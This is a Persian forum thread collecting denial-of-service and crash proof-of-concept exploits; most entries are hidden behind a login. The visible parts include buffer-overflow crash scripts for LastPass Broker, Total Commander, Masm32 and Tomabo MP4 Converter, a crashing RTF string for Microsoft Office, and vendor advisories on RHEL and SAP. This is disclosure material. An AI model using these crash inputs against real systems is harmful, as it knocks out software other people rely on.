تاپیک اکسپلویت های DOS & Poc

[DeMoN]

 

FTGate 2009 SR3 Denial Of Service

This is the hidden content, please

• ورود
• یا
• ثبت نام

[DeMoN]

 

Telegram Denial Of Service / Bypass Limit

This is the hidden content, please

• ورود
• یا
• ثبت نام

[DeMoN]

 

MakeSFX.exe 1.44 - Stack Buffer Overflow Exploit

This is the hidden content, please

• ورود
• یا
• ثبت نام

[DeMoN]

 

LanSpy 2.0.0.155 - Buffer Overflow

This is the hidden content, please

• ورود
• یا
• ثبت نام

[DeMoN]

 

OpenSMTPD Audit Report

This is the hidden content, please

• ورود
• یا
• ثبت نام

[DeMoN]

 

This is the hidden content, please

• ورود
• یا
• ثبت نام

********************************************************************************************

# Exploit Title: Last PassBroker Stack-based BOF

# Date: 9/23/2015

# Exploit Author: Un_N0n

# Software Link:

This is the hidden content, please

• ورود
• یا
• ثبت نام

# Version: 3.2.16

# Tested on: Windows 7 x86(32 BIT)

********************************************************************************************

[Steps to Produce the Crash]:

1- open 'LastPassBroker.exe'.

2- A Input-Box will appear asking for Email and Password,

In password field paste in the contents of crash.txt

3- Hit Login.

~Software will Crash.

This is the hidden content, please

• ورود
• یا
• ثبت نام

'''

junk = "A"*66666

file = open("CRASH.txt",'w')

file.write(junk)

file.close()

'''

> Vendor Notified, Fixed in latest Release.

**********************************************************************************************

[DeMoN]

 

LanWhoIs.exe 1.0.1.120 - Stack Buffer Overflow

This is the hidden content, please

• ورود
• یا
• ثبت نام

[DeMoN]

 

This is the hidden content, please

• ورود
• یا
• ثبت نام

OpenSource Security Ralf Spenneberg

Am Bahnhof 3-5

48565 Steinfurt

info@os-s.net

OS-S Security Advisory 2015-04

This is the hidden content, please

• ورود
• یا
• ثبت نام

Date: October 7th, 2015

Last Updated: October 7th, 2015

Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg

CVE: not yet assigned

CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)

Title: Local RedHat Enterprise Linux DoS – RHEL 7.1 Kernel crashes on invalid

USB device descriptors (usbvision driver)

Severity: Critical. The Kernel panics. A reboot is required.

Vendor contacted: March 13th 2015

This is the hidden content, please

• ورود
• یا
• ثبت نام

Ease of Exploitation: Trivial

Vulnerability type: Wrong input validation

Products: RHEL 7.1 including all updates

Abstract

The Kernel 3.10.0-123.20.1.el7.x86_64 crashes when presented a buggy USB

device which requires the usbvision driver. All subsequently published kernel

updates crash as well.

Detailed product description

We confirmed the bug on the following system:

RHEL 7.1

kernel >= 3.10.0-123.20.1.el7.x86_64

Further products or kernel versions have not been tested

Description

The bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo

(github.com/schumilo) using the following device descriptor:

[DeMoN]

 

FreeYouTubeToMP3 Converter 4.0.1 Buffer Overflow

This is the hidden content, please

• ورود
• یا
• ثبت نام

[DeMoN]

 

This is the hidden content, please

• ورود
• یا
• ثبت نام

Microsoft Office 2007 And 2010 RTF Frmtxtbrl EIP Corruption

The following crash was observed in MS Office 2007 running under Windows 2003 x86. Microsoft Office File Validation Add-In is disabled and application verified was enabled for testing and reproduction. This sample also reproduced in Office 2010 running on Windows 7 x86. It did not reproduce in Microsoft Office 2013 running under Windows 8.1 x86.

To reproduce place this string in a file with the extension .rtf and open with MS Word 2007 or 2010.

{\rtf1{\pn\pnlvlbody\pndbnuml}\absw9\chatn\sect\frmtxtbrl\par}

DLL Versions:

wwlib.dll: 12.0.6726.5000

mso.dll: 12.0.6721.5000

Found by: scvitti

[DeMoN]

This is the hidden content, please

• ورود
• یا
• ثبت نام

#!/usr/bin/python

# Exploit Title: Tomabo MP4 Converter 3.10.12 - (.m3u) Denial of service (Crush application)

# Date: [8-10-2015]

# Exploit Author: [M.Ibrahim] vulnbug@gmail.com

# E-Mail: vulnbug <at> gmail.com

# Vendor Homepage:

This is the hidden content, please

• ورود
• یا
• ثبت نام

# Version: [3.10.12]

# Tested on: windows 7 x86

junk="A"*600000

file = "exploit.m3u"

f=open(file,"w")

f.write(junk);

f.close();

[DeMoN]

 

VeryPDF HTML Converter 2.0 Buffer Overflow

This is the hidden content, please

• ورود
• یا
• ثبت نام

[DeMoN]

 

IKEView.exe R60 - Stack Buffer Overflow

This is the hidden content, please

• ورود
• یا
• ثبت نام

[DeMoN]

 

Microsoft Internet Explorer 11 - Stack Underflow Crash PoC

This is the hidden content, please

• ورود
• یا
• ثبت نام

[DeMoN]

 

This is the hidden content, please

• ورود
• یا
• ثبت نام

********************************************************************************************

# Exploit Title: Total Commander 32bit SEH Overwrite.

# Date: 8/27/2015

# Exploit Author: Un_N0n

# Software Vendor:

This is the hidden content, please

• ورود
• یا
• ثبت نام

# Software Link:

This is the hidden content, please

• ورود
• یا
• ثبت نام

download.htm

# Version: 8.52

# Tested on: Windows 8 x64(64 BIT)

********************************************************************************************

[Info:]

EAX 00106541

ECX FFFFFEFA

EDX 0031E941

EBX 04921F64

ESP 001065FC

EBP 41414141

ESI 04930088

EDI 0031E9B0

EIP 41414141

SEH chain of main thread, item 0

Address=001065FC

SE handler=41414141

'''

[Steps to Produce the Crash]:

1- Open up 'TOTALCMD.EXE'.

2- Goto Files -> Change Attributes.

3- In time field paste in contents of 'Crash.txt'.

~ Software will crash b/c SEH Overwrite.

This is the hidden content, please

• ورود
• یا
• ثبت نام

file = open("crash.txt",'w')

file.write("A"*5000)

file.close()

->After Reporting,

Vendor has released(bugfix release) a new version(8.52a[9th SEPT 2015]).

**********************************************************************************************

[DeMoN]

 

OpenLDAP 2.4.42 Denial Of Service

This is the hidden content, please

• ورود
• یا
• ثبت نام

[DeMoN]

 

Microsoft Office Excel 2007, 2010, 2013 - BIFFRecord

This is the hidden content, please

• ورود
• یا
• ثبت نام

[DeMoN]

 

Microsoft Office 2007 - BIFFRecord Length Use-After-Free

This is the hidden content, please

• ورود
• یا
• ثبت نام

[DeMoN]

 

This is the hidden content, please

• ورود
• یا
• ثبت نام

توضیحات:

This is the hidden content, please

• ورود
• یا
• ثبت نام

This is the hidden content, please

• ورود
• یا
• ثبت نام

[DeMoN]

 

Wireshark 1.12.7 - Division by Zero Crash PoC

This is the hidden content, please

• ورود
• یا
• ثبت نام

[DeMoN]

 

Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow 

This is the hidden content, please

• ورود
• یا
• ثبت نام

[DeMoN]

 

This is the hidden content, please

• ورود
• یا
• ثبت نام

# EXPLOIT TITLE: Masm32v11r Buffer Overflow(SEH overwrite) crash POC

# AUTHOR: VIKRAMADITYA "-OPTIMUS"

# Date of Testing: 22nd September 2015

# Download Link :

This is the hidden content, please

• ورود
• یا
• ثبت نام

# Tested On : Windows 10

# Steps to Crash :-

# Step 1: Execute this python script

# Step 2: This script will create a file called MASM_crash.txt

# Step 3: Now open Masm32's QUICK EDITOR

# Step 4: Go to Script > 'Convert Text to Script'

# Step 5: Open the MASM_crash.txt to convert

# Step 6: That should crash the program .

file = open('MASM_crash.txt' , 'w');

buffer = "A"*4676 + "B"*4 + "C"*4 + "D"*500

file.write(buffer);

file.close()

[DeMoN]

 

Apple qlmanage - SceneKit::daeElement::setElementName Heap Overflow

This is the hidden content, please

• ورود
• یا
• ثبت نام

[DeMoN]

 

This is the hidden content, please

• ورود
• یا
• ثبت نام

Onapsis Security Advisory 2015-013: SAP Business Objects Memory Corruption

1. Impact on Business

=====================

By exploiting this vulnerability an unauthenticated attacker could read or write any business-relevant information from the Business Intelligence Platform and also render the system unavailable to other users.

Risk Level: High

2. Advisory Information

=======================

* Public Release Date: 09/22/2015

* Last Revised: 09/22/2015

* Security Advisory ID: ONAPSIS-2015-013

* Onapsis SVS ID: ONAPSIS-00105

* CVE: N/A

* Researcher: Will Vandevanter

* Vendor Provided CVSS v2: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:C)

* Onapsis CVSS v2: 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C)

* Onapsis CVSS v3: 8.6 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H)

3. Vulnerability Information

============================

* Vendor: SAP AG

* Affected Components:

* BussinessObjects Edge 4.0

* BussinessObjects BI Platform 4.1

* BOXI 3.1 R3

* Vulnerability Class: Buffer Copy without Checking Size of Input (CWE-120)

* Remotely Exploitable: Yes

* Locally Exploitable: No

* Authentication Required: No

* Original Advisory:

This is the hidden content, please

• ورود
• یا
• ثبت نام

4. Affected Components Description

==================================

Business Objects is part of the Business Intelligence platform from SAP.

It has components that provide performance management, planning, reporting,

query and analysis and enterprise information management.

Every Business Objects installation provides a web service to interact with different platform services.

5. Vulnerability Details

========================

A mishandling of a malformed GIOP packet causes the remote listener to

crash while reading from invalid memory.

6. Solution

===========

Implement SAP Security Note 2001108.

7. Report Timeline

==================

12/23/2013: Onapsis provides vulnerability information to SAP AG.

12/24/2013: SAP AG confirms reception of vulnerability report.

01/14/2014: SAP reports fix is In Process.

05/12/2015: SAP releases SAP Security Note 2001108 fixing the vulnerability.

09/22/2015: Onapsis Releases Security Advisory.

About Onapsis Research Labs

===========================

Onapsis Research Labs provides the industry analysis of key security issues that impact business-critical systems and applications. Delivering frequent and timely security and compliance advisories with associated risk levels, Onapsis Research Labs combine in-depth knowledge and experience to deliver technical and business-context with sound security judgment to the broader information security community.

About Onapsis, Inc.

===================

Onapsis gives organizations the adaptive advantage to succeed in securing business-critical applications

by combining technology, research and analytics. Onapsis enables every security and compliance team an

adaptive approach to focus on the factors that matter most to their business– critical applications

that house vital data and run business processes including SAP Business

Suite, SAP HANA and SAP Mobile deployments.

[DeMoN]

 

This is the hidden content, please

• ورود
• یا
• ثبت نام

توضیحات:

This is the hidden content, please

• ورود
• یا
• ثبت نام

This is the hidden content, please

• ورود
• یا
• ثبت نام